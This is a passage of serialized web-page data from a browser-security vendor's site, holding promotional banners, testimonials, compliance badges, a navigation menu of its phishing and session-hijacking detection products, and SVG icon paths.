[{"data":1,"prerenderedAt":19663},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":36,"navbar-about-highlight":99,"navbar-resource-highlight":173,"trust-badges":217,"solution-nav":238,"fa-icon-sharp-regular-faFishingRod":378,"fa-icon-solid-faUserSecret":382,"fa-icon-sharp-regular-faLaptopCode":384,"fa-icon-solid-faTabletScreenButton":386,"fa-icon-solid-faThumbsUp":388,"fa-icon-solid-faPlugCircleXmark":390,"fa-icon-sharp-regular-faPuzzlePiece":392,"fa-icon-solid-faFileCircleXmark":394,"fa-icon-solid-faGhost":397,"fa-icon-solid-faQrcode":400,"fa-icon-solid-faCookieBite":402,"fa-icon-sharp-regular-faUserSecret":404,"fa-icon-sharp-regular-faRadar":406,"fa-icon-sharp-regular-faSatelliteDish":408,"fa-icon-sharp-regular-faShieldCheck":410,"fa-icon-sharp-regular-faBrainCircuit":412,"fa-icon-solid-faMobileScreenButton":414,"fa-icon-brands-faChrome":416,"fa-icon-solid-faDisplay":418,"fa-icon-solid-faFilter":420,"fa-icon-solid-faCloudArrowUp":422,"browser-attack-glossary":424,"latestResourcesBlogPosts":677,"browser-attack-glossary-data":17033,"fa-icon-regular-faKey":19543,"fa-icon-regular-faUserCheck":19545,"fa-icon-regular-faArrowPointer":19547,"fa-icon-regular-faDownload":19549,"fa-icon-regular-faPuzzlePiece":19551,"fa-icon-regular-faArrowRightArrowLeft":19553,"fa-icon-regular-faMask":19555,"fa-icon-regular-faArrowLeft":19557,"fa-icon-regular-faArrowRight":19559,"fa-icon-regular-faSliders":19561,"fa-icon-regular-faSparkles":19563,"fa-icon-regular-faBellRing":19565,"fa-icon-regular-faClone":19567,"fa-icon-regular-faPhoneArrowDownLeft":19569,"fa-icon-regular-faWindow":19571,"fa-icon-regular-faLayerGroup":19573,"fa-icon-regular-faClipboard":19575,"fa-icon-regular-faGlobe":19577,"fa-icon-regular-faCloudSlash":19579,"fa-icon-regular-faHandshake":19581,"fa-icon-regular-faCheckDouble":19583,"fa-icon-regular-faTriangleExclamation":19585,"fa-icon-regular-faArrowRightToBracket":19587,"fa-icon-regular-faKeySkeleton":19589,"fa-icon-regular-faShuffle":19591,"fa-icon-regular-faVideo":19593,"fa-icon-regular-faLaptopMobile":19595,"fa-icon-regular-faNetworkWired":19597,"fa-icon-regular-faArrowsRotate":19599,"fa-icon-regular-faCreditCard":19601,"fa-icon-regular-faWifi":19603,"fa-icon-regular-faGhost":19605,"fa-icon-regular-faEnvelope":19607,"fa-icon-regular-faFont":19609,"fa-icon-regular-faComment":19611,"fa-icon-regular-faHeadset":19613,"fa-icon-regular-faGrid2":19615,"fa-icon-regular-faDatabase":19617,"fa-icon-regular-faFileXmark":19619,"fa-icon-regular-faPlug":19621,"fa-icon-regular-faRectangleAd":19623,"fa-icon-regular-faShieldSlash":19625,"fa-icon-regular-faBrowser":19627,"fa-icon-regular-faBellPlus":19629,"fa-icon-regular-faShieldMinus":19631,"fa-icon-regular-faQrcode":19633,"fa-icon-regular-faBoxesStacked":19635,"fa-icon-regular-faRaindrops":19637,"fa-icon-regular-faFish":19639,"fa-icon-regular-faMagnifyingGlass":19641,"fa-icon-regular-faBarcodeRead":19643,"fa-icon-regular-faSiren":19645,"fa-icon-regular-faCookie":19647,"fa-icon-regular-faUsers":19649,"fa-icon-regular-faFileLock":19651,"fa-icon-regular-faKeyboard":19653,"fa-icon-regular-faBadgeCheck":19655,"fa-icon-regular-faPhoneVolume":19657,"fa-icon-regular-faDroplet":19659,"fa-icon-regular-faFishingRod":19661},[4],{"name":5,"enabled":6},"maintenanceMode",false,[8],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"meta":14,"query":22,"data":23,"variations":28,"lastUpdated":29,"firstPublished":30,"testRatio":31,"createdBy":32,"lastUpdatedBy":33,"folders":34,"rev":35},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner","1c6207a5f24948ab82d4a0b17f251193","published",{"breakpoints":15,"hasAutosaves":19,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},768,640,320,true,"data","",[],{"link":24,"text":25,"type":26,"url":27},{},"Get our latest report analyzing browser attack techniques in 2026","web-banner","https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fbrowser-attacks-report",{},1774258294825,1742208637545,1,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2","jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],"y84t8vdyew",{"createdBy":37,"createdDate":38,"data":39,"folders":86,"id":87,"lastUpdated":88,"lastUpdatedBy":37,"meta":89,"modelId":93,"name":94,"published":13,"query":95,"testRatio":31,"variations":96,"firstPublished":97,"stageModifiedSincePublish":6,"lastUpdateSource":60,"rev":98},"ST0tXQM8slWpFrmioqKHmENB2qe2",1774965361051,{"ctaText":40,"text":41,"url":21,"blocks":42,"state":82},"ewrererw","testrfesssssssssss",[43,71],{"@type":44,"@version":45,"id":46,"component":47,"responsiveStyles":61},"@builder.io\u002Fsdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":48,"tag":48,"options":49,"isRSC":60},"TopBannerContent",{"text":50,"ctaText":51,"url":52,"mainText":53,"cta":56,"styleVariant":59,"showMonsters":19},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks","Save Your Spot","https:\u002F\u002Fpushsecurity.com\u002Fwebinar\u002Fstate-of-browser-security",{"content":54,"fontSize":55},"\u003Cp class=\"\">Shadow AI monsters are lurking in the dark! Bust them all in our retro-inspired arcade game.\u003C\u002Fp>","text-base",{"content":57,"fontSize":55,"url":58},"\u003Cp class=\"\">Press start &gt;&gt;\u003C\u002Fp>","https:\u002F\u002Fpushsecurity.com\u002Flp\u002Fshadow-ai-busters","arcade",null,{"large":62},{"display":63,"flexDirection":64,"position":65,"flexShrink":66,"boxSizing":67,"marginTop":68,"marginBottom":68,"fontSize":69,"fontWeight":70},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"id":72,"@type":44,"tagName":73,"properties":74,"responsiveStyles":77},"builder-pixel-ws0avkvus4m","img",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},"https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fpixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true",{"large":78},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},"block","hidden","none",{"deviceSize":83,"location":84},"large",{"path":21,"query":85},{},[],"fd266d0172cc47429be7ad10f48c99ad",1789552629325,{"breakpoints":90,"hasAutosaves":19,"hasErrors":6,"hasLinks":6,"kind":91,"lastPreviewUrl":92},{"medium":16,"small":17,"xsmall":18},"component","https:\u002F\u002Fsite.dev.pushsecurity.com\u002F?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2Cadmin%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests%2CmergePullRequests%2CfusionHostingPublish%2CfusionHostingRevokeAiToken&builder.user.role.name=Admin&builder.user.role.id=admin&builder.cachebust=true&builder.preview=always-visible-banner&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.always-visible-banner=fd266d0172cc47429be7ad10f48c99ad&builder.overrides.fd266d0172cc47429be7ad10f48c99ad=fd266d0172cc47429be7ad10f48c99ad&builder.options.locale=Default","0678d178ec8b41efb8a23c09dba7874d","always visible banner",[],{},1774968080803,"hrlckazo2uk",[100,136],{"createdBy":32,"createdDate":101,"data":102,"folders":125,"id":126,"lastUpdated":127,"lastUpdatedBy":32,"meta":128,"modelId":130,"name":131,"published":13,"query":132,"stageModifiedSincePublish":6,"testRatio":31,"variations":133,"firstPublished":134,"rev":135},1776247359804,{"link":103,"testimonial":104,"testimonialLink":124,"type":107},{},{"@type":105,"id":106,"model":107,"value":108},"@builder.io\u002Fcore:Reference","f028f2b685bb47cd8bf9e82a26dd5a79","testimonial",{"query":109,"folders":110,"createdDate":111,"id":106,"name":112,"modelId":113,"published":13,"data":114,"variations":118,"lastUpdated":119,"firstPublished":120,"testRatio":31,"createdBy":37,"lastUpdatedBy":37,"meta":121,"rev":123},[],[],1735823466309,"We found Push to be more accurate when compared to competitors and the browser agent offered features that others couldn’t match.","42035571a56940ac98bff4544aa79aa5",{"author":115,"jobTitle":116,"quote":112,"image":117},"Jason Waits","\u003Cp>CISO at Inductive Automation\u003C\u002Fp>","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07",{},1735910703862,1735823501152,{"kind":20,"lastPreviewUrl":21,"breakpoints":122,"hasAutosaves":19},{"small":17,"medium":16},"ejt44b3n716","\u002Fcustomer-stories\u002Finductive-automation",[],"9136a8f18b3b4a6ba29b8653a99372b1",1776247404986,{"breakpoints":129,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},"20d9eaa352304613b3d1a794b400703d","testimonial-inductive-automation",[],{},1776247404973,"c0e0c6itmu",{"createdBy":32,"createdDate":137,"data":138,"folders":165,"id":166,"lastUpdated":167,"lastUpdatedBy":32,"meta":168,"modelId":130,"name":163,"published":13,"query":170,"stageModifiedSincePublish":6,"testRatio":31,"variations":171,"firstPublished":172,"rev":135},1776255761419,{"description":139,"image":140,"link":141,"testimonial":144,"title":163,"type":164},"Learn about the latest techniques being used in the wild.","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b4a5ebf81d64e8c9d7fc35f6c96c4a9",{"text":142,"url":143},"Download now","\u002Fresources\u002Fbrowser-attacks-report",{"@type":105,"id":145,"model":107,"value":146},"192acbb1f9ca4cac918c0ec435a8bae3",{"query":147,"folders":148,"createdDate":149,"id":145,"name":150,"modelId":113,"published":13,"data":151,"variations":157,"lastUpdated":158,"firstPublished":159,"testRatio":31,"createdBy":37,"lastUpdatedBy":32,"meta":160,"rev":162},[],[],1728981467463,"Push does for identity what CrowdStrike did for the endpoint",{"video":152,"jobTitle":153,"author":154,"qoute":21,"quote":155,"image":156},"https:\u002F\u002Fcdn.builder.io\u002Fo\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F8b30e8ca50064058bbaef0f3c6164575%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=8b30e8ca50064058bbaef0f3c6164575&alt=media&optimized=true","\u003Cp>Deputy CISO at Microsoft\u003C\u002Fp>\u003Cp>Former LinkedIn, Slack, Palantir\u003C\u002Fp>","Geoff Belknap","Push does for identity what CrowdStrike did for the endpoint.","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F748f0ad0a5064a00a13f4721fcc8dea1",{},1742902158597,1728981782923,{"kind":20,"lastPreviewUrl":21,"breakpoints":161,"hasAutosaves":19},{"small":17,"medium":16},"kxj3j9ybvds","Report: 2026 Browser Attack Techniques","resource",[],"05a9322735fc427db12e2740e4302300",1776255810913,{"breakpoints":169,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},[],{},1776255810900,[174,196],{"createdBy":32,"createdDate":175,"data":176,"folders":186,"id":187,"lastUpdated":188,"lastUpdatedBy":32,"meta":189,"modelId":191,"name":163,"published":13,"query":192,"stageModifiedSincePublish":6,"testRatio":31,"variations":193,"firstPublished":194,"rev":195},1776256900280,{"description":139,"image":140,"link":177,"testimonial":178,"title":163,"type":164},{"text":142,"url":143},{"@type":105,"id":145,"model":107,"value":179},{"query":180,"folders":181,"createdDate":149,"id":145,"name":150,"modelId":113,"published":13,"data":182,"variations":183,"lastUpdated":158,"firstPublished":159,"testRatio":31,"createdBy":37,"lastUpdatedBy":32,"meta":184,"rev":162},[],[],{"video":152,"jobTitle":153,"author":154,"qoute":21,"quote":155,"image":156},{},{"kind":20,"lastPreviewUrl":21,"breakpoints":185,"hasAutosaves":19},{"small":17,"medium":16},[],"1f429607996e4e5fae8fe3f9b9610e55",1776256937553,{"breakpoints":190,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},"4829faa81e7c4ee8bd2d000e160e8d3c",[],{},1776256937540,"dv7taxcdgne",{"createdBy":32,"createdDate":197,"data":198,"folders":208,"id":209,"lastUpdated":210,"lastUpdatedBy":32,"meta":211,"modelId":191,"name":213,"published":13,"query":214,"stageModifiedSincePublish":6,"testRatio":31,"variations":215,"firstPublished":216,"rev":195},1776256949234,{"link":199,"testimonial":200,"testimonialLink":124,"type":107},{},{"@type":105,"id":106,"model":107,"value":201},{"query":202,"folders":203,"createdDate":111,"id":106,"name":112,"modelId":113,"published":13,"data":204,"variations":205,"lastUpdated":119,"firstPublished":120,"testRatio":31,"createdBy":37,"lastUpdatedBy":37,"meta":206,"rev":123},[],[],{"author":115,"jobTitle":116,"quote":112,"image":117},{},{"kind":20,"lastPreviewUrl":21,"breakpoints":207,"hasAutosaves":19},{"small":17,"medium":16},[],"ce043785b71b4ece98eac811ecf4ba10",1776256974140,{"breakpoints":212,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},"inductive-automation",[],{},1776256974130,[218,222,226,230,234],{"title":219,"logo":220,"createdDate":221},"SOC2","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb6727a5e00004d6e9e69fc3068b8b64c",1784291539953,{"title":223,"logo":224,"createdDate":225},"GDPR","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ffe49f53211674deaa5a6640d929cdf42?format=webp",1784291672535,{"title":227,"logo":228,"createdDate":229},"Cyber essentials","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F53558c1045a342a7a28def960cd54ae7?format=webp",1784291702710,{"title":231,"logo":232,"createdDate":233},"ISO IEC 27001","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F578a404a61cf45db951a41fe3554d12d",1784291766222,{"title":235,"logo":236,"createdDate":237},"ISO IEC 27701","https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbe219844b13242fbba531959579a753c",1784291858848,[239,308,353],{"id":240,"label":241,"text":21,"navIcon":242,"items":243},"stop-browser-based-attacks","Stop browser-based attacks","solid:faShieldHalved",[244,249,254,259,264,269,274,279,284,288,293,298,303],{"title":245,"text":246,"url":247,"navIcon":248},"Phishing","Detect phishing behaviorally in the browser, regardless of the payload or delivery channel.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fzero-day-phishing","sharp-regular:faFishingRod",{"title":250,"text":251,"url":252,"navIcon":253},"Adversary-in-the-Middle","Detect and block MFA-bypassing AiTM phishing pages in real-time.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fadversary-in-the-middle-attacks","solid:faUserSecret",{"title":255,"text":256,"url":257,"navIcon":258},"ClickFix (and variants)","Intercept malicious copy and paste attacks at the point of interaction.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fclickfix-fix-variants","sharp-regular:faLaptopCode",{"title":260,"text":261,"url":262,"navIcon":263},"Device code phishing","Detect and block device code phishing kits designed to get around passkeys.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fdevice-code-phishing","solid:faTabletScreenButton",{"title":265,"text":266,"url":267,"navIcon":268},"Consent phishing","Detect and block malicious OAuth consent grants before access is authorized.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fconsent-phishing","solid:faThumbsUp",{"title":270,"text":271,"url":272,"navIcon":273},"Malicious OAuth integrations","Detect and block the root cause of SaaS supply chain attacks.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-oauth-integrations","solid:faPlugCircleXmark",{"title":275,"text":276,"url":277,"navIcon":278},"Malicious browser extensions","Inventory, monitor, and block risky browser extensions.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-browser-extensions","sharp-regular:faPuzzlePiece",{"title":280,"text":281,"url":282,"navIcon":283},"Malicious file downloads","Control which files users can download by type, source, and user group.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmalicious-file-downloads","solid:faFileCircleXmark",{"title":285,"text":286,"url":287,"navIcon":283},"Infostealers","Detect infostealer delivery and respond to a compromise.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Finfostealer-malware",{"title":289,"text":290,"url":291,"navIcon":292},"Ghost logins","Surface hidden login paths that bypass SSO and expose accounts.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fghost-logins","solid:faGhost",{"title":294,"text":295,"url":296,"navIcon":297},"Mobile phishing (QR & SMS)","Detect phishing regardless of whether it arrives via email, SMS, or QR code.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fmobile-phishing-qr-code-sms","solid:faQrcode",{"title":299,"text":300,"url":301,"navIcon":302},"Credential stuffing","Identify reused and compromised credentials across SaaS logins.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fcredential-stuffing","custom:credentialStuffing",{"title":304,"text":305,"url":306,"navIcon":307},"Session hijacking","Detect and respond to stolen session token replay with browser session markers.","\u002Fsolution\u002Fstop-browser-based-attacks\u002Fsession-hijacking","solid:faCookieBite",{"id":309,"label":310,"text":21,"navIcon":311,"items":312},"achieve-security-outcomes","Achieve security outcomes","solid:faCheckToSlot",[313,318,323,328,333,338,343,348],{"title":314,"text":315,"url":316,"navIcon":317},"Stop account takeover","Stop ATO with stolen credential and compromised token detection.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fstop-account-takeover","sharp-regular:faUserSecret",{"title":319,"text":320,"url":321,"navIcon":322},"Harden unmanaged identities","Harden access paths with visibility, detection, and guardrails.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fharden-unmanaged-identities","sharp-regular:faRadar",{"title":324,"text":325,"url":326,"navIcon":327},"Investigate browser-related incidents","Investigate and respond faster with unique browser telemetry.","\u002Fsolution\u002Fachieve-security-outcomes\u002Finvestigate-browser-related-incidents","sharp-regular:faSatelliteDish",{"title":329,"text":330,"url":331,"navIcon":332},"Secure shadow IT","See and control shadow SaaS in the browser.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-shadow-saas","sharp-regular:faShieldCheck",{"title":334,"text":335,"url":336,"navIcon":337},"Secure AI","See and control AI apps in the browser.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-ai","sharp-regular:faBrainCircuit",{"title":339,"text":340,"url":341,"navIcon":342},"Secure BYOD","Extend security to unmanaged devices without MDM.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-bring-your-own-device","solid:faMobileScreenButton",{"title":344,"text":345,"url":346,"navIcon":347},"Secure Chromebooks","Secure Chromebooks in the enterprise without endpoint agents. Push deploys as a browser extension — phishing detection, credential monitoring, and SaaS visibility via browser extension that works with Chrome OS.","\u002Fsolution\u002Fachieve-security-outcomes\u002Fsecure-chromebooks","brands:faChrome",{"title":349,"text":350,"url":351,"navIcon":352},"Data loss prevention","Enforce DLP at the point of interaction in the browser","\u002Fsolution\u002Fachieve-security-outcomes\u002Finvestigate-and-stop-data-loss","custom:investigateAndStopDataLoss",{"id":354,"label":355,"text":21,"navIcon":356,"items":357},"tool-replacements","Tool replacements","solid:faScrewdriverWrench",[358,363,368,373],{"title":359,"text":360,"url":361,"navIcon":362},"Remote browser isolation","Detect attacks that look like normal browsing.","\u002Fsolution\u002Ftool-replacements\u002Fremote-browser-isolation","solid:faDisplay",{"title":364,"text":365,"url":366,"navIcon":367},"Secure web gateways","Detect attacks inside the browser after SWGs allowed the connection.","\u002Fsolution\u002Ftool-replacements\u002Fsecure-web-gateways","solid:faFilter",{"title":369,"text":370,"url":371,"navIcon":372},"Cloud access security broker","Catch browser-based identity threats in real time, not after the fact.","\u002Fsolution\u002Ftool-replacements\u002Fcloud-access-security-broker","solid:faCloudArrowUp",{"title":374,"text":375,"url":376,"navIcon":377},"Security awareness training","Block real phishing instead of training users on simulations.","\u002Fsolution\u002Ftool-replacements\u002Fsecurity-awareness-training","custom:securityAwareness",{"w":379,"h":380,"d":381},448,512,"M284.6 0l91.4 0 0 160-48 0 0-112-36.6 0-203.4 58.1 0 181.9 40 0 0 224-128 0 0-224 40 0 0-218.1 17.4-5 224-64 3.2-.9zM80 336l-32 0 0 128 32 0 0-128zm176 8c0-76.8 64-136 96-152 32 16 96 75.2 96 152 0 32-16 80-64 112l32 40 0 16-128 0 0-16 32-40c-48-32-64-80-64-112zm128-32a24 24 0 1 0 -48 0 24 24 0 1 0 48 0z",{"w":379,"h":380,"d":383},"M171-16c-36.4 0-57.8 58.3-68.3 112L72 96c-13.3 0-24 10.7-24 24s10.7 24 24 24l24 0 0 32c0 17 3.3 33.2 9.3 48l-9.3 0 0 0-20.5 0c-15.2 0-27.5 12.3-27.5 27.5 0 3 .5 5.9 1.4 8.7l28.9 86.6C40.2 379.6 16 428.1 16 482.3 16 498.7 29.3 512 45.7 512l356.6 0c16.4 0 29.7-13.3 29.7-29.7 0-54.2-24.2-102.7-62.3-135.4l28.9-86.6c.9-2.8 1.4-5.7 1.4-8.7 0-15.2-12.3-27.5-27.5-27.5l-20.5 0 0 0-9.3 0c6-14.8 9.3-31 9.3-48l0-32 24 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-30.7 0c-10.4-53.7-31.9-112-68.3-112-9.6 0-19 3.9-27.5 8.2-8.2 4.1-18.4 7.8-25.5 7.8s-17.3-3.7-25.5-7.8C190-12.1 180.6-16 171-16zm93.7 484.4l-24.8-70.9 27.9-32.5c2.7-3.2 4.2-7.2 4.2-11.4 0-9.7-7.8-17.5-17.5-17.5l-61 0c-9.7 0-17.5 7.8-17.5 17.5 0 4.2 1.5 8.2 4.2 11.4l27.9 32.5-24.8 70.9-57-180.4 35.7 0c18.4 10.2 39.5 16 62 16s43.6-5.8 62-16l35.7 0-57 180.4zM224 256c-34.7 0-64.2-22.1-75.3-53 5.7 3.2 12.3 5 19.3 5l12.4 0c16.5 0 31.1-10.6 36.3-26.2 2.3-7 12.2-7 14.5 0 5.2 15.6 19.9 26.2 36.3 26.2l12.4 0c7 0 13.6-1.8 19.3-5-11.1 30.9-40.6 53-75.3 53z",{"w":17,"h":380,"d":385},"M112 80l416 0 0 224 48 0 0-272-512 0 0 272 48 0 0-224zM48 404.1l0-4.1 544 0 0 4.1-27.9 27.9-488.2 0-27.9-27.9zM592 352l-592 0 0 72 56 56 528 0 56-56 0-72-48 0zM281 169l17-17-33.9-33.9c-6.1 6.1-27.8 27.8-65 65l-17 17c6.1 6.1 27.8 27.8 65 65l17 17 33.9-33.9c-9-9-25-25-48-48l31-31zM393 135l-17-17-33.9 33.9c9 9 25 25 48 48-23 23-39 39-48 48L376 281.9c6.1-6.1 27.8-27.8 65-65l17-17c-6.1-6.1-27.8-27.8-65-65z",{"w":379,"h":380,"d":387},"M0 64C0 28.7 28.7 0 64 0L384 0c35.3 0 64 28.7 64 64l0 384c0 35.3-28.7 64-64 64L64 512c-35.3 0-64-28.7-64-64L0 64zM256 432a32 32 0 1 0 -64 0 32 32 0 1 0 64 0zM384 64l-320 0 0 288 320 0 0-288z",{"w":380,"h":380,"d":389},"M80 160c17.7 0 32 14.3 32 32l0 256c0 17.7-14.3 32-32 32l-48 0c-17.7 0-32-14.3-32-32L0 192c0-17.7 14.3-32 32-32l48 0zM270.6 16C297.9 16 320 38.1 320 65.4l0 4.2c0 6.8-1.3 13.6-3.8 19.9L288 160 448 160c26.5 0 48 21.5 48 48 0 19.7-11.9 36.6-28.9 44 17 7.4 28.9 24.3 28.9 44 0 23.4-16.8 42.9-39 47.1 4.4 7.3 7 15.8 7 24.9 0 22.2-15 40.8-35.4 46.3 2.2 5.5 3.4 11.5 3.4 17.7 0 26.5-21.5 48-48 48l-87.9 0c-36.3 0-71.6-12.4-99.9-35.1L184 435.2c-15.2-12.1-24-30.5-24-50l0-186.6c0-14.9 3.5-29.6 10.1-42.9L226.3 43.3C234.7 26.6 251.8 16 270.6 16z",{"w":17,"h":380,"d":391},"M192-32c17.7 0 32 14.3 32 32l0 96 128 0 0-96c0-17.7 14.3-32 32-32s32 14.3 32 32l0 96 64 0c17.7 0 32 14.3 32 32s-14.3 32-32 32l0 48.7c-98.6 8.1-176 90.7-176 191.3 0 27.3 5.7 53.3 16 76.9l0 3.1c0 17.7-14.3 32-32 32s-32-14.3-32-32l0-66.7C165.2 398.1 96 319.1 96 224l0-64c-17.7 0-32-14.3-32-32S78.3 96 96 96l64 0 0-96c0-17.7 14.3-32 32-32zM496 256a144 144 0 1 1 0 288 144 144 0 1 1 0-288zm59.3 107.3c6.2-6.2 6.2-16.4 0-22.6s-16.4-6.2-22.6 0l-36.7 36.7-36.7-36.7c-6.2-6.2-16.4-6.2-22.6 0s-6.2 16.4 0 22.6l36.7 36.7-36.7 36.7c-6.2 6.2-6.2 16.4 0 22.6s16.4 6.2 22.6 0l36.7-36.7 36.7 36.7c6.2 6.2 16.4 6.2 22.6 0s6.2-16.4 0-22.6l-36.7-36.7 36.7-36.7z",{"w":380,"h":380,"d":393},"M201.1 57.3c-7 5.3-9.1 10.7-9.1 14.7 0 4.5 2.8 11.2 12.4 16.9l11.6 7 0 48.1-168 0 0 60.5c7.4-2.9 15.5-4.5 24-4.5 43.1 0 72 39.4 72 80s-28.9 80-72 80c-8.5 0-16.6-1.6-24-4.5l0 108.5 108.5 0c-2.9-7.4-4.5-15.5-4.5-24 0-43.1 39.4-72 80-72s80 28.9 80 72c0 8.5-1.6 16.6-4.5 24l60.5 0 0-168 48.1 0 7 11.6c5.8 9.6 12.4 12.4 16.9 12.4 4 0 9.5-2.1 14.7-9.1s9.3-17.9 9.3-30.9-4-23.8-9.3-30.9-10.7-9.1-14.7-9.1c-4.5 0-11.2 2.8-16.9 12.4l-7 11.6-48.1 0 0-120-120 0 0-48.1 11.6-7c9.6-5.8 12.4-12.4 12.4-16.9 0-4-2.1-9.5-9.1-14.7S245 48 232 48 208.2 52 201.1 57.3zM172.3 18.9C188.5 6.8 209.6 0 232 0S275.5 6.8 291.7 18.9 320 49.5 320 72c0 8.6-1.8 16.7-4.9 24l100.9 0 0 100.9c7.3-3.1 15.4-4.9 24-4.9 22.5 0 41 12.2 53.1 28.3s18.9 37.3 18.9 59.7-6.8 43.5-18.9 59.7-30.6 28.3-53.1 28.3c-8.6 0-16.7-1.8-24-4.9l0 148.9-168 0 0-49.3 8.2-7.2c5.4-4.7 7.8-10.3 7.8-15.5 0-9.9-10.7-24-32-24s-32 14.1-32 24c0 5.3 2.4 10.8 7.8 15.5l8.2 7.2 0 49.3-216 0 0-216 49.3 0 7.2 8.2c4.7 5.4 10.3 7.8 15.5 7.8 9.9 0 24-10.7 24-32s-14.1-32-24-32c-5.3 0-10.8 2.4-15.5 7.8L49.3 264 0 264 0 96 148.9 96c-3.1-7.3-4.9-15.4-4.9-24 0-22.5 12.2-41 28.3-53.1z",{"w":395,"h":380,"d":396},576,"M96 0C60.7 0 32 28.7 32 64l0 384c0 35.3 28.7 64 64 64l180 0c-22.7-31.5-36-70.2-36-112 0-100.6 77.4-183.2 176-191.3l0-38.1c0-17-6.7-33.3-18.7-45.3L290.7 18.7C278.7 6.7 262.5 0 245.5 0L96 0zM357.5 176L264 176c-13.3 0-24-10.7-24-24L240 58.5 357.5 176zM432 544a144 144 0 1 0 0-288 144 144 0 1 0 0 288zm59.3-180.7l-36.7 36.7 36.7 36.7c6.2 6.2 6.2 16.4 0 22.6s-16.4 6.2-22.6 0l-36.7-36.7-36.7 36.7c-6.2 6.2-16.4 6.2-22.6 0s-6.2-16.4 0-22.6l36.7-36.7-36.7-36.7c-6.2-6.2-6.2-16.4 0-22.6s16.4-6.2 22.6 0l36.7 36.7 36.7-36.7c6.2-6.2 16.4-6.2 22.6 0s6.2 16.4 0 22.6z",{"w":398,"h":380,"d":399},384,"M40.1 467.1l-11.2 9C25.7 478.6 21.8 480 17.8 480 8 480 0 472 0 462.2L0 192C0 86 86 0 192 0S384 86 384 192l0 270.2c0 9.8-8 17.8-17.8 17.8-4 0-7.9-1.4-11.1-3.9l-11.2-9c-13.4-10.7-32.8-9-44.1 3.9L269.3 506c-3.3 3.8-8.2 6-13.3 6s-9.9-2.2-13.3-6l-26.6-30.5c-12.7-14.6-35.4-14.6-48.2 0L141.3 506c-3.3 3.8-8.2 6-13.3 6s-9.9-2.2-13.3-6L84.2 471c-11.3-12.9-30.7-14.6-44.1-3.9zM160 192a32 32 0 1 0 -64 0 32 32 0 1 0 64 0zm96 32a32 32 0 1 0 0-64 32 32 0 1 0 0 64z",{"w":379,"h":380,"d":401},"M64 160l64 0 0-64-64 0 0 64zM0 80C0 53.5 21.5 32 48 32l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48L0 80zM64 416l64 0 0-64-64 0 0 64zM0 336c0-26.5 21.5-48 48-48l96 0c26.5 0 48 21.5 48 48l0 96c0 